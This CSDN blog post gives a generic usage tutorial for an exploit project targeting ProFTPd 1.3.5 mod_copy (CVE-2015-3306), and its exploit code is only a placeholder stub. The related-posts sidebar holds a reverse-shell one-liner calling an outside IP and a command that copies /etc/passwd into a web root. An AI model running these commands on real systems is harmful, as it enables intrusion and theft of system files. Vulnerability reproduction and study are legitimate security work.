开源项目 exploit-CVE-2015-3306 使用教程

于 2024-08-20 09:58:52 发布
阅读量302 收藏 9
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00697/article/details/141349216
版权

开源项目 exploit-CVE-2015-3306 使用教程

exploit-CVE-2015-3306ProFTPd 1.3.5 - (mod_copy) Remote Command Execution exploit and vulnerable container项目地址:https://gitcode.com/gh_mirrors/ex/exploit-CVE-2015-3306

1. 项目的目录结构及介绍

exploit-CVE-2015-3306/
├── exploit.py
├── README.md
└── requirements.txt
  • exploit.py: 这是项目的主要执行文件,包含了利用 CVE-2015-3306 漏洞的代码。
  • README.md: 项目的说明文档,提供了项目的基本信息和使用方法。
  • requirements.txt: 列出了运行该项目所需的 Python 依赖包。

2. 项目的启动文件介绍

exploit.py 是项目的启动文件。该文件主要包含以下几个部分:

  • 导入依赖包: 导入了必要的 Python 库,如 socketsys
  • 定义漏洞利用函数: 包含了具体的漏洞利用逻辑。
  • 主函数: 处理命令行参数并调用漏洞利用函数。

以下是 exploit.py 的部分代码示例:

import socket
import sys

def exploit(target, port):
    # 漏洞利用逻辑
    pass

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: python exploit.py <target> <port>")
        sys.exit(1)
    target = sys.argv[1]
    port = int(sys.argv[2])
    exploit(target, port)

3. 项目的配置文件介绍

该项目没有显式的配置文件,所有的配置和参数都是通过命令行传递的。例如,运行 exploit.py 时需要指定目标地址和端口:

python exploit.py <target> <port>

其中 <target> 是目标服务器的 IP 地址或域名,<port> 是目标服务器的端口号。

exploit-CVE-2015-3306ProFTPd 1.3.5 - (mod_copy) Remote Command Execution exploit and vulnerable container项目地址:https://gitcode.com/gh_mirrors/ex/exploit-CVE-2015-3306

刘冶琳Maddox
关注
log4j2漏洞原理分析及复现-CVE-2021-44228 (vulfocus靶场)
yang1234567898的博客
04-18 3254
搭建靶场: docker pull vulfocus/log4j2-rce-2021-12-09 //拉取靶场镜像 docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 //运行靶场镜像 搭建成功! 利用漏洞 已经漏洞存在的情况下,构造攻击payload执行命令反弹shell bash -i >& /dev/tcp/192.168.96.166/1234 0>&1 由于...
cpx_proftpd:漏洞利用工具 CVE-2015-3306
06-11
cpx_proftpd Daniel Aldana 针对漏洞利用的 PoC。 Vadim Melihow 报告的错误。 ###方法1: 用法: python cpx_proftp.py <IP> <REMOTE> <REMOTE> 前任: python cpx_proftp.py 127.0.0.1 /etc/passwd /var/www/pass.txt 然后尝试: http://127.0.0.1/pass.txt ###方法2: 用法: python cpx_proftp.py <IP> <REMOTE> 前任: python cpx_proftp.py 127.0.0.1 /var/www/html 然后尝试: http:
cve-2015-3306-proftpd-vulfocus
最新发布
c0529的博客
06-23 623
proftp是用于搭建基于ftp协议的应用软件ProFTPD是ProFTPD团队的一套开源的FTP服务器软件。该软件具有可配置性强、安全、稳定等特点。ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令读取和写入任意文件。任何未经身份验证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到选定的目标。复制命令使用ProFTPD服务的权限执行,默认情况下,该服务在“nobody”用户的权限下运行。
cve-2015-3306复现
Yale的博客
04-02 3453
Cve-2015-3306 背景: ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令读取和写入任意文件。 任何未经身份验证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到选定的目标。 复制命令使用ProFTPD服务的权限执行,默认情况下,该服务在“nobody”用户的权限下运行。 通过使用/ proc / self / cmdlin...
propane:利用 proftpd 中的任意文件写入错误 (CVE-2015-3306) 尝试执行代码
07-22
丙烷 利用 ProFTPD 的 mod_copy 模块 (CVE-2015-3306) 中的任意文件写入错误并尝试执行代码。
exploit-CVE-2020-28926
03-04
标题“exploit-CVE-2020-28926”暗示了这是一个关于利用特定漏洞的程序或脚本,具体来说是针对CVE-2020-28926的安全漏洞。CVE(Common Vulnerabilities and Exposures)是国际上广泛使用的一种公开安全漏洞和暴露的...
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
"laravel-CVE-2021-3129-EXP-main.zip" 包含了利用此漏洞的 EXP(exploit,即利用程序)。攻击者可能会使用以下步骤来利用此漏洞: 1. 构造带有恶意文件名的 HTTP 请求,文件名可能包含类似于 `../` 或 `%00` 这样...
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
JBoss Application Server是一款广泛使用的开源应用服务器,由Red Hat公司维护。在2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行...
内网渗透命令浅谈
weixin_38116292的博客
05-11 570
即使命令也是区分大小写的(windows不区分,linux区分) windows和linux基本命令的对比 cd 打开目录 mkdir 创建目录 rmdir 删除目录 dir和ls,列文件 move和mv 移动文件 del和rm 删除文件 copy和cp 拷贝文件 type和cat 查看文件 echo 打印字符串 echo %cd% 和pwd 打印当前工作目录 findstr和grep 查找字符串 ===== kali也可以使用powershell 直接使...
Metasploitable3渗透测试实战
温柔小薛的博客
02-17 4635
这是一个著名的靶场Metasploitable3,关于靶机搭建网上文章非常多,这里我就不再写了,但是关于漏洞挖掘没有什么文章,而且这个靶场windows版本和linux版本还有差别,我这里写一些简单的吧,自己就挖到这个程度了,有不对的地方还请前辈高人指点一二 目录1综述2.渗透过程2.1渗透路径说明2.1.1全端口扫描/服务发现2.1.2目录扫描2.1.3一、ProFTPD 1.3.5命令读取和写入任意文件。2.1.4二、sql注入2.1.5三、phpmyadmin远程php代码执行2.1.6四、文件上传漏
shiro反序列化漏洞(CVE-2016-4437)
iO快到碗里来
09-14 4771
0x00 Java安全 一 、RMI/JRMP协议 TCP/IP协议相信大家都很了解了,不了解的可以自行百度。在这里我们先来简单来讲讲JRMP协议相关内容。JRMP是一个Java远程方法协议,该协议基于TCP/IP之上,RMI协议之下。也就是说RMI协议传递时底层使用的是JRMP协议,
应用协议漏洞,2024年最新百度、华为、京东、B站最新面试题汇集
04-16 391
【代码】应用协议漏洞,2024年最新百度、华为、京东、B站最新面试题汇集。
永恒之蓝Windows10版初探
crowsec
03-15 1606
永恒之蓝(ms17-010)通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。相关的cve有:CVE-2017-0145、CVE-2017-0146、CVE-2017-0147、CVE-2017-0148。基本上我们搜索永恒之蓝漏洞复现,99%的师傅选择的都是Windows7或者。
网络攻防技术——缓冲区溢出攻击实验
学习记录
02-27 5194
一、题目 本实验的学习目标是让学生将从课堂上学到的有关缓冲区溢出漏洞的知识进行实践,从而获得有关该漏洞的第一手经验。缓冲区溢出是指程序试图将数据写入预先分配的固定长度缓冲区边界之外的情况。恶意用户可利用此漏洞改变程序的流控制,甚至执行任意代码。此漏洞是由于数据存储(如缓冲区)和控件存储(如返回地址)的混合造成的:数据部分的溢出会影响程序的控制流,因为溢出会改变返回地址。 本实验将提供四台不同的服务器,每台服务器运行一个带有缓冲区溢出漏洞的程序。实验任务是开发一个利用漏洞的程序,并最终获得这些服务器上的roo
编写poc和exploit的几款常用工具介绍
热门推荐
koozxcv的博客
06-12 1万+
1.pwntools pwntools是一个CTF框架和漏洞利用开发库,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit。 pwntools对Ubuntu 12.04和14.04的支持最好,但是绝大多数的功能也支持Debian, Arch, FreeBSD, OSX, 等等。 sudo pip install pwntools即可安装
【网络攻防技术】实验四——缓冲区溢出攻击实验
qq_45755706的博客
02-27 9496
一、实验题目 本实验的学习目标是让学生将从课堂上学到的有关缓冲区溢出漏洞的知识进行实践,从而获得有关该漏洞的第一手经验。缓冲区溢出是指程序试图将数据写入预先分配的固定长度缓冲区边界之外的情况。恶意用户可利用此漏洞改变程序的流控制,甚至执行任意代码。此漏洞是由于数据存储(如缓冲区)和控件存储(如返回地址)的混合造成的:数据部分的溢出会影响程序的控制流,因为溢出会改变返回地址。 本实验将提供四台不同的服务器,每台服务器运行一个带有缓冲区溢出漏洞的程序。实验任务是开发一个利用漏洞的程序,并最终获得这些服务器上的r
mysql 漏洞 2015_Oracle MySQL Server远程安全漏洞(CVE-2015-0411)
weixin_34570232的博客
01-21 853
发布日期:2015-01-20更新日期:2015-01-22受影响系统:Oracle MySQL Server <= 5.6.21Oracle MySQL Server <= 5.5.40描述:BUGTRAQ ID: 72191CVE(CAN) ID: CVE-2015-0411Oracle MySQL Server是一个轻量的关系型数据库系统。Oracle MySQL Server...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

刘冶琳Maddox

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值